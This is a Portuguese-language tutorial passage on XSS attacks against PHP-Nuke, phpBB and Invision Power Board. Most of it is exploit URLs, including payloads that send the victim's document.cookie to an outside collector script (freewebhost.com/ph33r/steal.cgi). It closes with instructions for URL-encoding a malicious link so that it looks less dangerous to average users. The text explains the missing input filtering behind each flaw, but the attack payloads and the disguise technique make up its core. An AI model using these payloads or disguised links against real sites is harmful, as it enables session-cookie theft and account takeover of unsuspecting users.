Vulnerabilidades e exploits no PHP NUKE:
http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=['http://freewebhost.com/ph33r/steal.cgi?'+document.cookie]
O exploit acima pode explorar uma vulnerabilidade no PHP Nuke, pois o arquivos modules.php falham em limpar a inserção de dados pelo usuário.
Vulnerabilidades e exploits em fóruns PHPBB:
http://localhost.com/phpBB2/login.php('http://freewebhost.com/ph33r/steal.cgi?'document.cookie)
O exploit acima é para uma vulnerabilidade
HTTP Splitting em fóruns phpBB. HTTP Splitting é quando alguém injeta informações no cabeçalho HTTP. Novamente, se o programa php filtrasse os dados digitados pelo usuário, isso não seria permitido.
Invision Power Board:
http://[target]/index.php?act='><script>alert(document.cookie)</script>
O exploit acima é, obviamente o conceito mais básico de exploits, e tudo o que ele faz é exibir uma caixa de mensagem.
Esse exploit é para vulnerabilidades no IPB que permite que em suas versões mais antigas (<2.03) isso ocorra, pelo fato de não haver tratamento dos dados digitados.
Após vermos as vulnerabilidades acima, podemos perceber que ataques XSS podem ocorrer principalmente em sites onde os desenvolvedores falharam em tratar o código para fazer filtragem do que é digitado pelos usuários.
Codificando URLs de ataque
Codificar URLs de ataque é algo muito simples de fazer, bastando utilizar um programa específico para facilmente disfarçar um link malicioso em algo que não parece tão perigoso.
Usando o seguinte site:
http://ostermiller.org/calc/encode.html
Podemos transformar o seguinte link:
http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=['http://freewebhost.com/ph33r/steal.cgi?'+document.cookie]
Neste outro:
http://localhost/nuke73/modules.php%3Fname%3DNews%26file%3Darticle%26sid%3D1%26optionbox%3D%5B%27http%3A//freewebhost.com/ph33r/steal.cgi%3F%27%2Bdocument.cookie%5D
Embora a URL possa ficar maior, essa codificação faz com a URL pareça menos arriscada ou perigosa para o usuário mediano. Codifiquei essa URL a partir do endereço mencionado acima.